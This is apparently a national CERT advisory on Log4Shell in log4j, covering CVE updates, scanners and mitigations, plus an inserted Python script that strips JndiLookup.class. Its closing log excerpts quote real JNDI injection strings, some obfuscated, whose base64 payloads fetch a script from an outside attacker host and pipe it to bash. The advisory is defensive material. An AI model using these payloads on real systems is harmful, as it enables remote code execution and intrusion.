15.12.2021 12:00

Special Report: Recommendations on Log4Shell

14 December 2021

Document history

Version  Date  Description
1.0  14.12.2021 17:30  Initial version
1.1  15.12.2021 12:00  Outdated mitigations removed
1.2  15.12.2021 17:00  Further mitigations
1.3  23.12.2021 14:45  CVE(s) added, fixed versions updated
1.4  29.12.2021 12:10  CVE added, fixed versions updated, further sample data

 

General

A critical vulnerability, also known as "Log4Shell", exists in a widely used Java library (log4j); in the worst case it allows complete takeover of the affected system. "Widely used" here means a large number of different software products and appliances which, at first glance, need not have anything to do with Java. Version 2.16.0 fixes the problem and is already available. See also our separate warning, which is updated continuously. In addition, external scans are being evaluated, and we contact affected companies.

Update: 23 December 2021

After the original vulnerability CVE-2021-44228 was fixed in Log4j version 2.15, it turned out that this fix was insufficient and that version 2.15 is vulnerable to the newly discovered vulnerability CVE-2021-45046. Initially classified as a DoS, this vulnerability was upgraded to an RCE with a CVSS score of 9.0. Log4j version 2.16 fixes this problem as well, but is in turn susceptible to CVE-2021-45105 (CVSS score 7.5), a vulnerability found shortly after the update was released. Successful exploitation of this vulnerability leads, by means of a recursive lookup, to a denial-of-service condition and termination of the application.

Update: 29 December 2021

After several patches for the originally vulnerable Log4j version (2.14), a security researcher has now succeeded in attacking the most recent version (2.17) as well. The complexity of the attack is, however, significantly higher, and it requires as a basic precondition configurations that are not part of the default settings. An attacker with access to the Log4j configuration files can manipulate them to make Log4j use a JDBC adapter in order to load resources via JNDI.

Detection

To examine your systems for affected Java components at the file-system level, CERT.at recommends the scanner provided by Logpresso. The scanner is available both as an executable program and as source code to compile yourself. Network administrators who want to test a fleet of systems over the network can use the scanner from fullhunt.io. This scanner uses Interactsh as its backend, which can be self-hosted.

Mitigations

The following mitigations have been reported to us from the industry; some of them have been applied successfully:

Patch, patch, patch!

At present, updating the log4j library is the most sustainable mitigation. Besides new default settings, which mean that fresh installations are not vulnerable, further problems relating to JNDI lookups have been fixed. In version 2.16.0, JNDI lookups are by default performed only against localhost.

Update: 23 December 2021

According to Apache's updated patch notes, the vulnerabilities CVE-2021-45046 and CVE-2021-45105 are fixed in the following versions:

  • CVE-2021-45046 (RCE): Log4j 2.16.0 (Java 8) and Log4j 2.12.2 (Java 7)
  • CVE-2021-45105 (DoS): Log4j 2.17.0 (Java 8), 2.12.3 (Java 7) and 2.3.1 (Java 6)

 

Disabling JNDI

Integrating an empty JndiLookup class prevents the resolution of all JNDI directives. The procedure for this, as well as the required class files, from the following repo can serve as a template for your own implementation. The patch returns empty JNDI lookups, which Log4j2 can handle.

Never use code from unknown sources without having reviewed and understood it yourself!

Blocking outbound traffic

To prevent malware from being downloaded after a successful attack, outbound network connections can be blocked on the firewall. In some cases this can impair the functionality of the system; where possible, however, we recommend implementing this measure as additional protection. A DENY ANY ANY rule at the firewall level is considered best practice, especially in server networks, and is recommended if not already implemented. Implementation differs by vendor and product.

Blocking outbound network traffic from affected systems can make attacks more difficult; it must be assumed, however, that this mitigation is not a lasting fix. Additional mechanisms for securing your own network are nevertheless generally recommended.

Repackaging vulnerable log4j-core-*.jar/*.war/*.ear

This mitigation is needed for log4j versions prior to 2.10.0 2.16.0 when patching is not possible, because other mitigations, such as setting environment variables or start parameters, only help from version 2.10.0 onwards.

  • Unpack the .jar/.war/.ear file
  • Remove the component JndiLookup.class
  • Repack the remaining components

Caution: This mitigation may cause errors in the running application, because components have been removed from the corresponding .jar file (java.lang.ClassNotFoundException).
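
The three repackaging steps above, carried out in one pass, as an added example that is not part of the original report. It goes slightly beyond the list by also descending into archives nested inside a .war/.ear; the function names and the sample archive are assumptions of this example, and the entry path is the class's location in log4j-core.

```python
import io
import zipfile
from typing import Tuple

# Entry name of the lookup class inside log4j-core 2.x.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def strip_jndi_lookup(archive: bytes) -> Tuple[bytes, int]:
    """Repack a .jar/.war/.ear without JndiLookup.class.

    Returns (repacked archive bytes, number of entries removed). Archives
    bundled inside the archive (e.g. WEB-INF/lib/*.jar) are processed too.
    Relocated ("shaded") copies under a renamed package are NOT detected.
    """
    removed = 0
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src, \
            zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename.endswith(JNDI_CLASS):
                removed += 1          # step 2: drop the class
                continue
            data = src.read(info)     # step 1: unpack the entry
            if info.filename.lower().endswith(ARCHIVE_SUFFIXES):
                try:
                    repacked, nested = strip_jndi_lookup(data)
                except zipfile.BadZipFile:
                    nested = 0        # archive suffix but not a ZIP: copy as is
                if nested:
                    data, removed = repacked, removed + nested
            # step 3: repack; reusing the ZipInfo keeps name, timestamp and
            # compression method (nested JARs that were stored stay stored)
            dst.writestr(info, data)
    return out.getvalue(), removed


def repack_file(src_path: str, dst_path: str) -> int:
    """Write a cleaned copy to dst_path; the original file is left untouched."""
    with open(src_path, "rb") as fh:
        fixed, removed = strip_jndi_lookup(fh.read())
    with open(dst_path, "wb") as fh:
        fh.write(fixed)
    return removed


def build_sample_war() -> bytes:
    """Constructed test input: a WAR bundling a fake log4j-core JAR."""
    jar = io.BytesIO()
    with zipfile.ZipFile(jar, "w") as z:
        z.writestr(JNDI_CLASS, b"constructed placeholder, not real bytecode")
        z.writestr("org/apache/logging/log4j/core/Logger.class", b"placeholder")
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-X.Y.Z.jar", jar.getvalue())
        z.writestr("WEB-INF/lib/broken.jar", b"not a zip file")
        z.writestr("WEB-INF/web.xml", b"constructed placeholder")
    return war.getvalue()


if __name__ == "__main__":
    cleaned, count = strip_jndi_lookup(build_sample_war())
    print(f"removed {count} JndiLookup.class entr{'y' if count == 1 else 'ies'}")
```

A return value of 0 from `repack_file` means nothing was removed, so the copy should not be treated as mitigated on that basis alone.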

JVM start parameters

If the application in use is affected and cannot currently be fixed by patching, the JVM can be started with the following parameter to prevent the resolution of ${jndi://...} directives: java -Dlog4j2.formatMsgNoLookups=true

Environment variables

The resolution of JNDI directives can also be prevented by setting the following environment variable: LOG4J_FORMAT_MSG_NO_LOOKUPS=true This variable must be set in the environment used by the JVM.

Update: 29 December 2021

According to Apache's updated patch notes, the vulnerability CVE-2021-44832 is fixed in the following versions:

  • Log4j 2.3.2 (Java 6), 2.12.4 (Java 7), and 2.17.1 (Java 8 and later)

Live artefacts

The following anonymised excerpts from a log file were passed to us. This is what an attack on your system could look like in the log files:

195.54.160.149 - - [23/Dec/2021:00:55:04 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [23/Dec/2021:10:59:38 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [23/Dec/2021:10:59:38 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
185.184.152.140 - - [23/Dec/2021:18:32:19 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://185.203.118.200:1389/Exploit}"
195.54.160.149 - - [23/Dec/2021:21:57:11 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10004 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [24/Dec/2021:07:18:53 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [24/Dec/2021:07:18:54 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10008 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [24/Dec/2021:17:56:57 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
170.210.45.163 - - [25/Dec/2021:01:23:47 +0100] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 301 606 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [25/Dec/2021:01:23:47 +0100] "GET / HTTP/1.1" 301 516 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
195.54.160.149 - - [25/Dec/2021:03:53:27 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [25/Dec/2021:03:53:27 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [25/Dec/2021:14:39:09 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [25/Dec/2021:23:50:32 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [25/Dec/2021:23:50:32 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [26/Dec/2021:11:03:21 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [26/Dec/2021:20:36:48 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [26/Dec/2021:20:36:48 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [27/Dec/2021:07:42:44 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo} HTTP/1.1" 200 10003 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo0NDN8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMjAzLjAuMTEzLjQ6NDQzKXxiYXNo}"
195.54.160.149 - - [27/Dec/2021:17:39:49 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 301 927 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
195.54.160.149 - - [27/Dec/2021:17:39:49 +0100] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==} HTTP/1.1" 200 10007 "http://203.0.113.4:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8yMDMuMC4xMTMuNDo4MCl8YmFzaA==}"
175.6.210.66 - - [27/Dec/2021:21:04:08 +0100] "GET /${jndi:ldap://121.140.99.236:1389/Exploit} HTTP/1.1" 404 5195 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
175.6.210.66 - - [27/Dec/2021:21:04:12 +0100] "GET / HTTP/1.1" 200 30307 "-" "${jndi:ldap://121.140.99.236:1389/Exploit}"
164.90.235.177 - - [27/Dec/2021:21:22:45 +0100] "GET / HTTP/1.1" 301 516 "${jndi:dns://89-22-120-248.scanworld.net/ref}" "${jndi:dns://89-22-120-248.scanworld.net/ua}"
